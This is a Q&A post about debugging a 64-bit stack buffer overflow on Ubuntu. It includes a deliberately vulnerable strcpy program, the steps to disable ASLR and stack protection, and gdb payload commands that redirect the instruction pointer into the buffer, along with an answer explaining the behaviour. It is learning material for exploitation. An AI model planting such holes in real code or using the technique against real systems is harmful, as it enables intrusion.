# x86-64 bit Buffer Overflow, help with overwriting %rip

Tags: buffer-overflow, amd64

I am trying to get a buffer overflow exploit to work on Ubuntu 16.04 LTS 64bit.

To this end I use the following vulnerable program:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{

    char buffer[256];
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    return 0;
}
```

I deactivate ALSR (temporarily set `/proc/sys/kernel/randomize_va_space` to `0`) and compile my code with

```
gcc vuln.c -o vuln -z execstack -fno-stack-protector
```

I manage to overwrite `rip` with 6 `B`'s using

```
gdb$ run $(python -c 'print "A"*264 + "B"*6')
```

and get the following result in gdb:

```
RSI: 0x602010 ('A' <repeats 200 times>...)
RDI: 0x1 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffd9d0 --> 0x0 
RIP: 0x424242424242 ('BBBBBB')
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
```

Which makes perfect sense to me.

I would like to overwrite `rip` with the beginning of my buffer of "`A`"'s so I can later place my shellcode at the beginning of the buffer (preceeded by some noop's):

So, knowing, how many `A`'s I wrote in the buffer I have a look at `rsp` minus an offset (I am just playing with the offset until I get a line starting with `A`'s:

```
gdb$ x/20x $rsp-288
0x7fffffffd8b0: 0x00007fffffffdaa8  0x0000000200000000
0x7fffffffd8c0: 0x4141414141414141  0x4141414141414141
0x7fffffffd8d0: 0x4141414141414141  0x4141414141414141
```

So, from this I am taking, that my buffer starts at `0x7fffffffd8c0` on the stack.

Next I'll redirect `rip` to `0x7fffffffd8c0` as follows:

```
gdb$ run $(python -c 'print "A"*264 + "\x7f\xff\xff\xff\xd8\xc0"[::-1]')
```

Which works:

```
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffd9d0 --> 0x0 
RIP: 0x7fffffffd8c0 ('A' <repeats 200 times>...)
```

As I am planning to put shellcode at the beginning of the buffer I just assume, my shellcode will be 10 bytes long and see if this works:

```
gdb$ run $(python -c 'print "S"*10 + "A"*254 + "\x7f\xff\xff\xff\xd8\xc0"[::-1]')
```

and now something I don't understand happens: Despite the fact, that I write exactly the same amount of characters into my buffer, the value of `rip` changes, apparently it no longer points to the start of my buffer:

```
RSI: 0x602010 ("SSSSSSSSSS", 'A' <repeats 190 times>...)
RDI: 0x1 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffd980 --> 0x0 
RIP: 0x7fffffffd8ca ('A' <repeats 182 times>)
```

Instead of `0x7fffffffd8c0` `rip` now contains `0x7fffffffd8ca`.

So it is actually still pointing to the beginning of my `A`'s instead of the `S`'s which I injected in my python command:

```
gdb-peda$ x/20 $rip-10
0x7fffffffd8c0: 0x5353535353535353  0x4141414141415353
0x7fffffffd8d0: 0x4141414141414141  0x4141414141414141
```

Obviously I am just getting started with this stuff.

Why is this happening?

What am I missing?

Comment: Have you tried with another number of 'S' characters ? Does it work the same or is it really linked to the fact you have 0xa characters ?

Answer (score 6, accepted):

Don't worry, the shellcode is executing properly, just that the debugger "skipped" past the execution.

Remember that `rip` is the instruction pointer and whatever code present at the `rip` is executed. If the code is invalid however, something will go wrong (for example a SIGSEGV will be raised)

In this particular case, a `S` (byte `\x53`) corresponds to a `push rbx` command (which is valid, and push 8 bytes to the stack), while an `A` is a `rex.B` - basically speaking, it causes a SIGSEGV in this case.

So in the latter case, ten `push rbx` commands get executed. (note the `esp` is decreased by `0x7fffffffd9d0 - 0x7fffffffd980 = 0x50`, which is 10 times the size of `rbx`)

What you can do instead: Break at the `ret` instruction in the `main` function. After the breakpoint is hit, execute 1 more instruction then the `rip` should have the desired value.